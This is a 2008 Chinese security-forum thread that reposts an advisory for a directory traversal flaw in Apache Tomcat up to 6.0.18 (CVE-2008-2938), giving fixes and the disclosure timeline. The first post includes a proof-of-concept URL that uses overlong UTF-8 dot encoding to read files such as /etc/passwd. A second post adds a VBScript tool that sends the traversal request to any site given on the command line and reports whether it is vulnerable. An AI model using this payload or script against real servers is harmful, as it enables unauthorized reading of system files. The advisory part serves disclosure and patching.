Apache Tomcat <= 6.0.18 UTF8 Directory Traversal Vulnerability

root

团队执行官

Rank: 8 Rank: 8

E.S.T社区执行帐号社区主管

帖子: 15
精华: 0
积分: 262
阅读权限: 200
在线时间: 28 小时
注册时间: 2005-6-7
最后登录: 2008-12-4

发短消息
加为好友
当前离线

楼主大中小发表于 2008-8-12 09:38 只看该作者

Apache Tomcat <= 6.0.18 UTF8 Directory Traversal Vulnerability

复制内容到剪贴板

代码:

Title: Apache Tomcat Directory Traversal Vulnerability

Author: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)

Severity: High

Impact: Remote File Disclosure

Vulnerable Version: prior to 6.0.18

Solution:

 - Best Choice: Upgrade to 6.0.18 (http://tomcat.apache.org)

 - Hot fix: Disable allowLinking or do not set URIencoding to utf8 in order to avoid this vulnerability.

 - Tomcat 5.5.x and 4.1.x Users: The fix will be included in the next releases. Please apply the hot fix until next release.

References:

 - http://tomcat.apache.org/security.html

 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938

History:

 - 07.17.2008: Initiate notify (To Apache Security Team)

 - 08.02.2008: Responsed this problem fixed and released new version

 - 08.05.2008: Notify disclosure (To Apache Tomcat Security Team)

 - 08.10.2008: Responsed with some suggestions.



Description

As Apache Security Team, this problem occurs because of JAVA side.

If your context.xml or server.xml allows 'allowLinking'and 'URIencoding' as

'UTF-8', an attacker can obtain your important system files.(e.g.  /etc/passwd)



Exploit

If your webroot directory has three depth(e.g /usr/local/wwwroot), An

attacker can access arbitrary files as below. (Proof-of-concept)



http://www.target.com/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar



# milw0rm.com [2008-08-11]

[ 本帖最后由 root 于 2008-8-12 09:39 编辑 ]

邪恶八进制信息安全团队
--努力为祖国的信息安全撑起一片蓝天!

TOP

root

团队执行官

Rank: 8 Rank: 8

E.S.T社区执行帐号社区主管

帖子: 15
精华: 0
积分: 262
阅读权限: 200
在线时间: 28 小时
注册时间: 2005-6-7
最后登录: 2008-12-4

发短消息
加为好友
当前离线

沙发大中小发表于 2008-8-12 09:38 只看该作者

VBS 测试版:

复制内容到剪贴板

代码:

Dim strUrl,strSite



showB()

Set Args = Wscript.Arguments



If Args.Count <> 1 Then

ShowU()

Else

strSite=Args(0)

End If



   strUrl="/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar"



   Set objXML = CreateObject("Microsoft.XMLHTTP")

   objXML.Open "GET",strSite & strUrl, False

   objXML.SetRequestHeader "Referer", strSite 



   objXML.send()



if objXML.status=200 then

   wscript.echo("存在漏洞")



end if



 



Sub showB()

With Wscript

   .Echo("+--------------------------=====================------------------------------+")

   .Echo("Exploit Apache Tomcat UTF-8")

   .Echo("Code By Safe3")

   .Echo("+--------------------------=====================------------------------------+")

End with

End Sub

Sub showU()

With Wscript

   .Echo("+--------------------------=====================------------------------------+")

   .Echo("用法:")

   .Echo(" cscript "&.ScriptName&" site")

   .Echo("例子:")

   .Echo(" cscript "&.ScriptName&" http://www.example.com >result.txt")

   .Echo("+--------------------------=====================------------------------------+")

   .Quit

End with

End Sub

邪恶八进制信息安全团队
--努力为祖国的信息安全撑起一片蓝天!

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Apache Tomcat <= 6.0.18 UTF8 Directory Traversal Vulnerability